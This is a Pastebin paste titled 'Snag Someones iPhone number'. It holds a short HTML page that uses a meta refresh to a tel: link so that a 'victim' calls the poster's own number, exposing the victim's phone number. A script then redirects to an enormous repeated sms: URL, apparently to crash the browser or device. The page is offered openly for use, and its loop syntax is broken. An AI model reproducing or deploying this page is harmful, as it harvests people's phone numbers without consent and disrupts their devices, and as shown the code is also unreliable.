Advertisement
illwill

Snag Someones iPhone number

Nov 7th, 2016
241
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.43 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>iPhone Recon</title>
  4. <!-- Replace the ###YOURNUMBER### with your own google voice number etc, for victim to call you on //-->
  5. <meta http-equiv="refresh" content="1; URL=tel:###YOURNUMBER###">
  6. </head>
  7. </body>
  8. <script lang=javascript>
  9. l = "sms:";
  10. for (i = 0; < 10000; i++) {
  11.     l = l + "33400948034298232";
  12. }
  13. function a() {
  14.     window.location.href = l;
  15. }
  16. setTimeout("a()", 1300);
  17. </script>
  18. </body>
  19. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement